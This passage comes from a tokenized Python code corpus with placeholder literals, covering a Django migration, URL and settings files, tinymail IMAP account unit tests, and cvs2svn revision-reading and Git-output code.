'<STR_LIT:\n>' ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( choices = [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] , max_length = <NUM_LIT> , default = '<STR_LIT>' ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> from django . conf . urls import patterns , include , url <EOL> from django . views . generic import TemplateView <EOL> from django . contrib import admin <EOL> admin . autodiscover ( ) <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , include ( admin . site . urls ) ) , <EOL> url ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> url ( r'<STR_LIT>' , TemplateView . as_view ( template_name = "<STR_LIT>" ) ) , <EOL> url ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> ) </s>
<s> from mock import Mock , MagicMock <EOL> import unittest2 as unittest <EOL> from contextlib import contextmanager <EOL> from monocle . callback import defer <EOL> from helpers import mock_db , listen_for , mock_worker <EOL> def _account_for_test ( config = None , db = None ) : <EOL> from tinymail . account import Account <EOL> if config is None : <EOL> config = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> if db is None : <EOL> db = MagicMock ( ) <EOL> return Account ( config , db ) <EOL> msg13_data = ( <NUM_LIT> , set ( [ r'<STR_LIT>' ] ) , "<STR_LIT>" ) <EOL> msg22_data = ( <NUM_LIT> , set ( [ ] ) , "<STR_LIT>" ) <EOL> class AccountTest ( unittest . TestCase ) : <EOL> def test_list_folders ( self ) : <EOL> account = _account_for_test ( ) <EOL> fol1 , fol2 = Mock ( ) , Mock ( ) <EOL> account . _folders = { '<STR_LIT>' : fol1 , '<STR_LIT>' : fol2 } <EOL> folders = list ( account . list_folders ( ) ) <EOL> self . assertEqual ( folders , [ fol1 , fol2 ] ) <EOL> def test_get_folder ( self ) : <EOL> account = _account_for_test ( ) <EOL> fol1 , fol2 = Mock ( ) , Mock ( ) <EOL> account . _folders = { '<STR_LIT>' : fol1 , '<STR_LIT>' : fol2 } <EOL> ret_fol1 = account . get_folder ( '<STR_LIT>' ) <EOL> self . assertTrue ( ret_fol1 is fol1 ) <EOL> class FolderTest ( unittest . TestCase ) : <EOL> def test_list_messages ( self ) : <EOL> from tinymail . account import Folder <EOL> folder = Folder ( Mock ( ) , '<STR_LIT>' ) <EOL> msg1 , msg2 = Mock ( ) , Mock ( ) <EOL> folder . _messages = { <NUM_LIT:1> : msg1 , <NUM_LIT:2> : msg2 } <EOL> messages = list ( folder . list_messages ( ) ) <EOL> self . assertEqual ( messages , [ msg1 , msg2 ] ) <EOL> def test_get_message ( self ) : <EOL> from tinymail . account import Folder <EOL> folder = Folder ( Mock ( ) , '<STR_LIT>' ) <EOL> msg1 , msg2 = Mock ( ) , Mock ( ) <EOL> folder . 
_messages = { <NUM_LIT:1> : msg1 , <NUM_LIT:2> : msg2 } <EOL> self . assertEqual ( folder . get_message ( <NUM_LIT:1> ) , msg1 ) <EOL> self . assertEqual ( folder . get_message ( <NUM_LIT:2> ) , msg2 ) <EOL> class AccountUpdateTest ( unittest . TestCase ) : <EOL> def test_list_folders ( self ) : <EOL> from tinymail . account import account_updated <EOL> account = _account_for_test ( ) <EOL> folders = { '<STR_LIT>' : { } , '<STR_LIT>' : { } } <EOL> with mock_worker ( ** folders ) : <EOL> with listen_for ( account_updated ) as caught_signals : <EOL> account . perform_update ( ) <EOL> self . assertEqual ( set ( f . name for f in account . list_folders ( ) ) , <EOL> set ( folders ) ) <EOL> self . assertEqual ( caught_signals , [ ( account , { } ) ] ) <EOL> def test_list_messages ( self ) : <EOL> from tinymail . account import folder_updated <EOL> account = _account_for_test ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT:6> : None } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT:6> : None , <NUM_LIT:8> : None } ) : <EOL> with listen_for ( folder_updated ) as caught_signals : <EOL> account . perform_update ( ) <EOL> fol1 = account . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( set ( m . uid for m in fol1 . list_messages ( ) ) , <EOL> set ( [ <NUM_LIT:6> , <NUM_LIT:8> ] ) ) <EOL> event_data = { '<STR_LIT>' : [ <NUM_LIT:8> ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] } <EOL> self . assertEqual ( caught_signals , [ ( fol1 , event_data ) ] ) <EOL> def test_message_removed_on_server ( self ) : <EOL> from tinymail . account import folder_updated <EOL> account = _account_for_test ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT:6> : None , <NUM_LIT:8> : None } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT:6> : None } ) : <EOL> with listen_for ( folder_updated ) as caught_signals : <EOL> account . perform_update ( ) <EOL> fol1 = account . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ m . 
uid for m in fol1 . list_messages ( ) ] , [ <NUM_LIT:6> ] ) <EOL> event_data = { '<STR_LIT>' : [ ] , '<STR_LIT>' : [ <NUM_LIT:8> ] , '<STR_LIT>' : [ ] } <EOL> self . assertEqual ( caught_signals , [ ( fol1 , event_data ) ] ) <EOL> def test_only_get_new_headers ( self ) : <EOL> account = _account_for_test ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT:6> : None , <NUM_LIT:8> : None } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT:6> : None , <NUM_LIT:8> : None , <NUM_LIT> : None } ) as worker : <EOL> account . perform_update ( ) <EOL> worker . get_message_headers . assert_called_once_with ( set ( [ <NUM_LIT> ] ) ) <EOL> def test_empty_folder ( self ) : <EOL> account = _account_for_test ( ) <EOL> with mock_worker ( fol1 = { } ) as worker : <EOL> account . perform_update ( ) <EOL> self . assertFalse ( worker . get_message_headers . called ) <EOL> def test_load_full_message ( self ) : <EOL> from tinymail . account import message_updated <EOL> account = _account_for_test ( ) <EOL> mime_message = "<STR_LIT>" <EOL> with mock_worker ( fol1 = { <NUM_LIT:6> : None } ) as worker : <EOL> account . perform_update ( ) <EOL> message = account . get_folder ( '<STR_LIT>' ) . _messages [ <NUM_LIT:6> ] <EOL> worker . get_message_body . return_value = defer ( mime_message ) <EOL> worker . close_mailbox . reset_mock ( ) <EOL> with listen_for ( message_updated ) as caught_signals : <EOL> message . load_full ( ) <EOL> self . assertEqual ( message . raw_full , mime_message ) <EOL> self . assertEqual ( caught_signals , [ ( message , { } ) ] ) <EOL> worker . close_mailbox . assert_called_once_with ( ) <EOL> def test_folder_removed_on_server ( self ) : <EOL> account = _account_for_test ( ) <EOL> with mock_worker ( fol1 = { } , fol2 = { } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { } ) : <EOL> account . perform_update ( ) <EOL> self . assertEqual ( [ f . name for f in account . 
list_folders ( ) ] , [ '<STR_LIT>' ] ) <EOL> def test_trust_uidvalidity ( self ) : <EOL> account = _account_for_test ( ) <EOL> msg13_bis_data = ( <NUM_LIT> , set ( [ r'<STR_LIT>' ] ) , "<STR_LIT>" ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_data } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_bis_data } ) : <EOL> account . perform_update ( ) <EOL> fol1 = account . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ m . raw_headers for m in fol1 . list_messages ( ) ] , <EOL> [ msg13_data [ <NUM_LIT:2> ] ] ) <EOL> def test_uidvalidity_changed ( self ) : <EOL> account = _account_for_test ( ) <EOL> msg13_bis_data = ( <NUM_LIT> , set ( [ r'<STR_LIT>' ] ) , "<STR_LIT>" ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_data , '<STR_LIT>' : <NUM_LIT> } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_bis_data , '<STR_LIT>' : <NUM_LIT> } ) : <EOL> account . perform_update ( ) <EOL> fol1 = account . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ m . raw_headers for m in fol1 . list_messages ( ) ] , <EOL> [ msg13_bis_data [ <NUM_LIT:2> ] ] ) <EOL> def test_message_flags_changed ( self ) : <EOL> from tinymail . account import folder_updated <EOL> account = _account_for_test ( ) <EOL> msg13_bis_data = ( <NUM_LIT> , set ( [ r'<STR_LIT>' ] ) , "<STR_LIT>" ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_data } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_bis_data } ) : <EOL> with listen_for ( folder_updated ) as caught_signals : <EOL> account . perform_update ( ) <EOL> fol1 = account . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ m . flags for m in fol1 . list_messages ( ) ] , <EOL> [ set ( [ '<STR_LIT>' ] ) ] ) <EOL> event_data = { '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ <NUM_LIT> ] } <EOL> self . 
assertEqual ( caught_signals , [ ( fol1 , event_data ) ] ) <EOL> def test_close_mailbox_after_update ( self ) : <EOL> account = _account_for_test ( ) <EOL> with mock_worker ( fol1 = { } ) as worker : <EOL> account . perform_update ( ) <EOL> worker . close_mailbox . assert_called_once_with ( ) <EOL> class PersistenceTest ( unittest . TestCase ) : <EOL> def test_folders ( self ) : <EOL> db = mock_db ( ) <EOL> account = _account_for_test ( db = db ) <EOL> with mock_worker ( myfolder = { } ) as worker : <EOL> account . perform_update ( ) <EOL> account2 = _account_for_test ( db = db ) <EOL> folders = list ( account2 . list_folders ( ) ) <EOL> self . assertEqual ( len ( folders ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( folders [ <NUM_LIT:0> ] . name , '<STR_LIT>' ) <EOL> def test_folders_removed ( self ) : <EOL> db = mock_db ( ) <EOL> account = _account_for_test ( db = db ) <EOL> with mock_worker ( fol1 = { } , fol2 = { } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { } ) : <EOL> account . perform_update ( ) <EOL> account2 = _account_for_test ( db = db ) <EOL> self . assertEqual ( [ f . name for f in account2 . list_folders ( ) ] , [ '<STR_LIT>' ] ) <EOL> def test_messages ( self ) : <EOL> db = mock_db ( ) <EOL> account = _account_for_test ( db = db ) <EOL> msg4_data = ( <NUM_LIT:4> , set ( [ r'<STR_LIT>' ] ) , "<STR_LIT>" ) <EOL> msg22_data = ( <NUM_LIT> , set ( [ r'<STR_LIT>' , r'<STR_LIT>' ] ) , "<STR_LIT>" ) <EOL> with mock_worker ( myfolder = { <NUM_LIT:4> : msg4_data , <NUM_LIT> : msg22_data } ) as worker : <EOL> account . perform_update ( ) <EOL> account2 = _account_for_test ( db = db ) <EOL> myfolder = account2 . get_folder ( '<STR_LIT>' ) <EOL> messages = list ( myfolder . list_messages ( ) ) <EOL> messages . sort ( key = lambda m : m . uid ) <EOL> self . assertEqual ( len ( messages ) , <NUM_LIT:2> ) <EOL> msg4 , msg22 = messages <EOL> self . assertEqual ( msg4 . uid , <NUM_LIT:4> ) <EOL> self . assertEqual ( msg4 . 
flags , set ( [ r'<STR_LIT>' ] ) ) <EOL> self . assertEqual ( msg4 . raw_headers , "<STR_LIT>" ) <EOL> self . assertEqual ( msg22 . uid , <NUM_LIT> ) <EOL> self . assertEqual ( msg22 . flags , set ( [ r'<STR_LIT>' , r'<STR_LIT>' ] ) ) <EOL> self . assertEqual ( msg22 . raw_headers , "<STR_LIT>" ) <EOL> def test_message_removed ( self ) : <EOL> db = mock_db ( ) <EOL> account = _account_for_test ( db = db ) <EOL> with mock_worker ( fol1 = { <NUM_LIT:6> : None , <NUM_LIT:8> : None } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT:6> : None } ) : <EOL> account . perform_update ( ) <EOL> account2 = _account_for_test ( db = db ) <EOL> fol1 = account2 . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ m . uid for m in fol1 . list_messages ( ) ] , [ <NUM_LIT:6> ] ) <EOL> def test_uidvalidity ( self ) : <EOL> db = mock_db ( ) <EOL> account = _account_for_test ( db = db ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_data , '<STR_LIT>' : <NUM_LIT> } ) : <EOL> account . perform_update ( ) <EOL> account2 = _account_for_test ( db = db ) <EOL> fol1 = account2 . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( fol1 . _uidvalidity , <NUM_LIT> ) <EOL> def test_uidvalidity_changed ( self ) : <EOL> db = mock_db ( ) <EOL> account = _account_for_test ( db = db ) <EOL> msg13_bis_data = ( <NUM_LIT> , set ( [ r'<STR_LIT>' ] ) , "<STR_LIT>" ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_data , '<STR_LIT>' : <NUM_LIT> } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_bis_data , '<STR_LIT>' : <NUM_LIT> } ) : <EOL> account . perform_update ( ) <EOL> account2 = _account_for_test ( db = db ) <EOL> fol1 = account2 . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( fol1 . _uidvalidity , <NUM_LIT> ) <EOL> self . assertEqual ( [ m . raw_headers for m in fol1 . 
list_messages ( ) ] , <EOL> [ msg13_bis_data [ <NUM_LIT:2> ] ] ) <EOL> def test_message_flags_changed ( self ) : <EOL> db = mock_db ( ) <EOL> account = _account_for_test ( db = db ) <EOL> msg13_bis_data = ( <NUM_LIT> , set ( [ r'<STR_LIT>' ] ) , "<STR_LIT>" ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_data } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_bis_data } ) : <EOL> account . perform_update ( ) <EOL> account2 = _account_for_test ( db = db ) <EOL> fol1 = account2 . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ m . flags for m in fol1 . list_messages ( ) ] , <EOL> [ set ( [ '<STR_LIT>' ] ) ] ) <EOL> class ModifyFlagsTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . db = mock_db ( ) <EOL> self . account = _account_for_test ( db = self . db ) <EOL> self . imap_data = { '<STR_LIT>' : { <EOL> <NUM_LIT:4> : ( <NUM_LIT:4> , set ( [ r'<STR_LIT>' ] ) , "<STR_LIT>" ) , <EOL> <NUM_LIT:15> : ( <NUM_LIT:15> , set ( [ r'<STR_LIT>' ] ) , "<STR_LIT>" ) , <EOL> <NUM_LIT> : ( <NUM_LIT> , set ( [ r'<STR_LIT>' , r'<STR_LIT>' ] ) , "<STR_LIT>" ) , <EOL> } } <EOL> with mock_worker ( ** self . imap_data ) : <EOL> self . account . perform_update ( ) <EOL> def test_add_flag ( self ) : <EOL> from tinymail . account import folder_updated <EOL> fol1 = self . account . get_folder ( '<STR_LIT>' ) <EOL> with mock_worker ( ** self . imap_data ) as worker : <EOL> with listen_for ( folder_updated ) as caught_signals : <EOL> fol1 . change_flag ( [ <NUM_LIT:4> , <NUM_LIT:15> ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> event_data = { '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ <NUM_LIT:4> , <NUM_LIT:15> ] } <EOL> self . assertEqual ( caught_signals , [ ( fol1 , event_data ) ] ) <EOL> worker . change_flag . assert_called_once_with ( [ <NUM_LIT:4> , <NUM_LIT:15> ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( fol1 . get_message ( <NUM_LIT:4> ) . flags , set ( [ '<STR_LIT>' ] ) ) <EOL> self . 
assertEqual ( fol1 . get_message ( <NUM_LIT:15> ) . flags , <EOL> set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> accountB = _account_for_test ( db = self . db ) <EOL> fol1B = accountB . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( fol1B . get_message ( <NUM_LIT:4> ) . flags , set ( [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( fol1B . get_message ( <NUM_LIT:15> ) . flags , <EOL> set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> def test_del_flag ( self ) : <EOL> from tinymail . account import folder_updated <EOL> fol1 = self . account . get_folder ( '<STR_LIT>' ) <EOL> with mock_worker ( ** self . imap_data ) as worker : <EOL> with listen_for ( folder_updated ) as caught_signals : <EOL> fol1 . change_flag ( [ <NUM_LIT:4> , <NUM_LIT:15> ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> event_data = { '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ <NUM_LIT:4> , <NUM_LIT:15> ] } <EOL> self . assertEqual ( caught_signals , [ ( fol1 , event_data ) ] ) <EOL> worker . change_flag . assert_called_once_with ( [ <NUM_LIT:4> , <NUM_LIT:15> ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( fol1 . get_message ( <NUM_LIT:4> ) . flags , set ( ) ) <EOL> self . assertEqual ( fol1 . get_message ( <NUM_LIT:15> ) . flags , set ( [ '<STR_LIT>' ] ) ) <EOL> accountB = _account_for_test ( db = self . db ) <EOL> fol1B = accountB . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( fol1B . get_message ( <NUM_LIT:4> ) . flags , set ( ) ) <EOL> self . assertEqual ( fol1B . get_message ( <NUM_LIT:15> ) . flags , set ( [ '<STR_LIT>' ] ) ) <EOL> def test_close_mailbox_after_changing_flags ( self ) : <EOL> account = _account_for_test ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_data } ) as worker : <EOL> account . perform_update ( ) <EOL> worker . close_mailbox . reset_mock ( ) <EOL> account . get_folder ( '<STR_LIT>' ) . change_flag ( [ <NUM_LIT> ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> worker . close_mailbox . 
assert_called_once_with ( ) <EOL> class MessagesCopyTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . db = mock_db ( ) <EOL> self . account = _account_for_test ( db = self . db ) <EOL> self . imap_data = { '<STR_LIT>' : { <NUM_LIT> : msg13_data } , '<STR_LIT>' : { <NUM_LIT> : msg22_data } } <EOL> with mock_worker ( ** self . imap_data ) : <EOL> self . account . perform_update ( ) <EOL> self . fol1 = self . account . get_folder ( '<STR_LIT>' ) <EOL> self . fol2 = self . account . get_folder ( '<STR_LIT>' ) <EOL> def test_copy_one_message ( self ) : <EOL> with mock_worker ( ** self . imap_data ) as worker : <EOL> self . fol1 . copy_messages ( [ <NUM_LIT> ] , self . fol2 ) <EOL> worker . copy_messages . assert_called_once_with ( [ <NUM_LIT> ] , '<STR_LIT>' ) <EOL> def test_local_data_after_copy ( self ) : <EOL> with mock_worker ( ** self . imap_data ) as worker : <EOL> self . fol1 . copy_messages ( [ <NUM_LIT> ] , self . fol2 ) <EOL> fol2_msgs = list ( self . fol2 . list_messages ( ) ) <EOL> self . assertEqual ( len ( fol2_msgs ) , <NUM_LIT:2> ) <EOL> uid = max ( self . fol2 . _messages ) <EOL> msg = self . fol2 . get_message ( uid ) <EOL> self . assertEqual ( msg . flags , msg13_data [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( msg . raw_headers , msg13_data [ <NUM_LIT:2> ] ) <EOL> accountB = _account_for_test ( db = self . db ) <EOL> fol2B = accountB . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( len ( list ( fol2B . list_messages ( ) ) ) , <NUM_LIT:2> ) <EOL> msgB = fol2B . get_message ( uid ) <EOL> self . assertEqual ( msgB . flags , msg13_data [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( msgB . raw_headers , msg13_data [ <NUM_LIT:2> ] ) <EOL> def test_copy_event ( self ) : <EOL> from tinymail . account import folder_updated <EOL> with mock_worker ( ** self . imap_data ) as worker : <EOL> with listen_for ( folder_updated ) as caught_signals : <EOL> self . fol1 . copy_messages ( [ <NUM_LIT> ] , self . fol2 ) <EOL> uid = max ( self . 
fol2 . _messages . keys ( ) ) <EOL> event_data = { '<STR_LIT>' : [ uid ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] } <EOL> self . assertEqual ( caught_signals , [ ( self . fol2 , event_data ) ] ) </s>
<s> DEBUG = True <EOL> TEMPLATE_DEBUG = DEBUG <EOL> ADMINS = ( <EOL> ) <EOL> MANAGERS = ADMINS <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> TIME_ZONE = '<STR_LIT>' <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> SITE_ID = <NUM_LIT:1> <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> MEDIA_ROOT = '<STR_LIT>' <EOL> MEDIA_URL = '<STR_LIT>' <EOL> STATIC_ROOT = '<STR_LIT>' <EOL> STATIC_URL = '<STR_LIT>' <EOL> STATICFILES_DIRS = ( <EOL> ) <EOL> STATICFILES_FINDERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> SECRET_KEY = '<STR_LIT>' <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> WSGI_APPLICATION = '<STR_LIT>' <EOL> TEMPLATE_DIRS = ( <EOL> ) <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> LOGGING = { <EOL> '<STR_LIT:version>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT:class>' : '<STR_LIT>' <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> } <EOL> } <EOL> import django <EOL> if django . VERSION [ : <NUM_LIT:2> ] < ( <NUM_LIT:1> , <NUM_LIT:6> ) : <EOL> TEST_RUNNER = '<STR_LIT>' <EOL> else : <EOL> TEST_RUNNER = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> from cvs2svn_lib . common import canonicalize_eol <EOL> from cvs2svn_lib . common import FatalError <EOL> from cvs2svn_lib . process import get_command_output <EOL> from cvs2svn_lib . context import Ctx <EOL> from cvs2svn_lib . revision_manager import RevisionReader <EOL> from cvs2svn_lib . keyword_expander import expand_keywords <EOL> from cvs2svn_lib . keyword_expander import collapse_keywords <EOL> from cvs2svn_lib . apple_single_filter import get_maybe_apple_single <EOL> class AbstractRCSRevisionReader ( RevisionReader ) : <EOL> """<STR_LIT>""" <EOL> _text_options = { <EOL> ( False , '<STR_LIT>' ) : ( [ '<STR_LIT>' ] , '<STR_LIT>' ) , <EOL> ( False , '<STR_LIT>' ) : ( [ '<STR_LIT>' ] , '<STR_LIT>' ) , <EOL> ( False , '<STR_LIT>' ) : ( [ '<STR_LIT>' ] , None ) , <EOL> ( True , '<STR_LIT>' ) : ( [ '<STR_LIT>' ] , None ) , <EOL> ( True , '<STR_LIT>' ) : ( [ '<STR_LIT>' ] , None ) , <EOL> ( True , '<STR_LIT>' ) : ( [ '<STR_LIT>' ] , None ) , <EOL> } <EOL> def get_pipe_command ( self , cvs_rev , k_option ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def get_content ( self , cvs_rev ) : <EOL> eol_fix = cvs_rev . get_property ( '<STR_LIT>' ) or None <EOL> keyword_handling = cvs_rev . get_property ( '<STR_LIT>' ) or None <EOL> try : <EOL> ( k_option , explicit_keyword_handling ) = self . _text_options [ <EOL> bool ( eol_fix ) , keyword_handling <EOL> ] <EOL> except KeyError : <EOL> raise FatalError ( <EOL> '<STR_LIT>' <EOL> % ( keyword_handling , cvs_rev , ) <EOL> ) <EOL> data = get_command_output ( self . get_pipe_command ( cvs_rev , k_option ) ) <EOL> if Ctx ( ) . decode_apple_single : <EOL> data = get_maybe_apple_single ( data ) <EOL> if explicit_keyword_handling == '<STR_LIT>' : <EOL> data = expand_keywords ( data , cvs_rev ) <EOL> elif explicit_keyword_handling == '<STR_LIT>' : <EOL> data = collapse_keywords ( data ) <EOL> if eol_fix : <EOL> data = canonicalize_eol ( data , eol_fix ) <EOL> return data </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import bisect <EOL> import time <EOL> import shutil <EOL> from cvs2svn_lib import config <EOL> from cvs2svn_lib . common import InternalError <EOL> from cvs2svn_lib . log import logger <EOL> from cvs2svn_lib . context import Ctx <EOL> from cvs2svn_lib . symbol import Trunk <EOL> from cvs2svn_lib . symbol import Branch <EOL> from cvs2svn_lib . symbol import Tag <EOL> from cvs2svn_lib . cvs_item import CVSSymbol <EOL> from cvs2svn_lib . dvcs_common import DVCSOutputOption <EOL> from cvs2svn_lib . dvcs_common import MirrorUpdater <EOL> from cvs2svn_lib . key_generator import KeyGenerator <EOL> from cvs2svn_lib . artifact_manager import artifact_manager <EOL> class GitRevisionWriter ( MirrorUpdater ) : <EOL> def start ( self , mirror , f ) : <EOL> MirrorUpdater . start ( self , mirror ) <EOL> self . f = f <EOL> def _modify_file ( self , cvs_item , post_commit ) : <EOL> raise NotImplementedError ( ) <EOL> def add_file ( self , cvs_rev , post_commit ) : <EOL> MirrorUpdater . add_file ( self , cvs_rev , post_commit ) <EOL> self . _modify_file ( cvs_rev , post_commit ) <EOL> def modify_file ( self , cvs_rev , post_commit ) : <EOL> MirrorUpdater . modify_file ( self , cvs_rev , post_commit ) <EOL> self . _modify_file ( cvs_rev , post_commit ) <EOL> def delete_file ( self , cvs_rev , post_commit ) : <EOL> MirrorUpdater . delete_file ( self , cvs_rev , post_commit ) <EOL> self . f . write ( '<STR_LIT>' % ( cvs_rev . cvs_file . cvs_path , ) ) <EOL> def branch_file ( self , cvs_symbol ) : <EOL> MirrorUpdater . branch_file ( self , cvs_symbol ) <EOL> self . _modify_file ( cvs_symbol , post_commit = False ) <EOL> def finish ( self ) : <EOL> MirrorUpdater . finish ( self ) <EOL> del self . f <EOL> class GitRevisionMarkWriter ( GitRevisionWriter ) : <EOL> def register_artifacts ( self , which_pass ) : <EOL> GitRevisionWriter . register_artifacts ( self , which_pass ) <EOL> if Ctx ( ) . revision_collector . 
blob_filename is None : <EOL> artifact_manager . register_temp_file_needed ( <EOL> config . GIT_BLOB_DATAFILE , which_pass , <EOL> ) <EOL> def start ( self , mirror , f ) : <EOL> GitRevisionWriter . start ( self , mirror , f ) <EOL> if Ctx ( ) . revision_collector . blob_filename is None : <EOL> logger . normal ( '<STR_LIT>' ) <EOL> blobf = open ( <EOL> artifact_manager . get_temp_file ( config . GIT_BLOB_DATAFILE ) , '<STR_LIT:rb>' , <EOL> ) <EOL> shutil . copyfileobj ( blobf , f ) <EOL> blobf . close ( ) <EOL> def _modify_file ( self , cvs_item , post_commit ) : <EOL> if cvs_item . cvs_file . executable : <EOL> mode = '<STR_LIT>' <EOL> else : <EOL> mode = '<STR_LIT>' <EOL> self . f . write ( <EOL> '<STR_LIT>' <EOL> % ( mode , cvs_item . revision_reader_token , <EOL> cvs_item . cvs_file . cvs_path , ) <EOL> ) <EOL> class GitRevisionInlineWriter ( GitRevisionWriter ) : <EOL> def __init__ ( self , revision_reader ) : <EOL> self . revision_reader = revision_reader <EOL> def register_artifacts ( self , which_pass ) : <EOL> GitRevisionWriter . register_artifacts ( self , which_pass ) <EOL> self . revision_reader . register_artifacts ( which_pass ) <EOL> def start ( self , mirror , f ) : <EOL> GitRevisionWriter . start ( self , mirror , f ) <EOL> self . revision_reader . start ( ) <EOL> def _modify_file ( self , cvs_item , post_commit ) : <EOL> if cvs_item . cvs_file . executable : <EOL> mode = '<STR_LIT>' <EOL> else : <EOL> mode = '<STR_LIT>' <EOL> self . f . write ( <EOL> '<STR_LIT>' <EOL> % ( mode , 